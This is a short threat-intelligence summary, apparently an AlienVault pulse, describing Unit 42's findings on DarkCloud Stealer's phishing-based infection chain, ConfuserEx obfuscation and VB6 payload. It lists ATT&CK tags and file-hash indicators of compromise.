Unit 42 researchers have identified a shift in the delivery method and obfuscation techniques used for distributing DarkCloud Stealer. The new infection chain, observed since April 2025, involves ConfuserEx obfuscation and a final payload written in Visual Basic 6. The attack begins with phishing emails containing compressed archives (TAR, RAR, or 7Z) that include JavaScript or Windows Script files. These files download and execute a PowerShell script, which then drops an executable protected by ConfuserEx. The final payload is a VB6 executable injected into a legitimate process using RunPE techniques. The malware employs various obfuscation methods, including anti-tampering, symbol renaming, and proxy call methods, to complicate analysis and evade detection. Author: AlienVault
Related Tags:
confuserex
visual basic 6
DarkCloud Stealer
T1027.004
process hollowing
T1553.002
infection chain
T1059.005
anti-analysis
Associated Indicators:
F6D9198BD707C49454B83687AF926CCB8D13C7E43514F59EAC1507467E8FB140
9588C9A754574246D179C9FB05FEA9DC5762C855A3A2A4823B402217F82A71C1
FA598E761201582D41A73D174EB5EDAD10F709238D99E0BF698DA1601C71D1CA
24552408D849799B2CAC983D499B1F32C88C10F88319339D0EEC00FB01BB19B4
6B8A4C3D4A4A0A3AEA50037744C5FEC26A38D3FB6A596D006457F1C51BBC75C7
2BD43F839D5F77F22F619395461C1EEAEE9234009B475231212B88BD510D00B7
CE3A3E46CA65D779D687C7E58FB4A2EB784E5B1B4CEBE33DBB2BF37CCCB6F194
72D3DE12A0AA8CE87A64A70807F0769C332816F27DCF8286B91E6819E2197AA8
B90DF42F2218E59097A1DF29CF5B8C88BB2E7922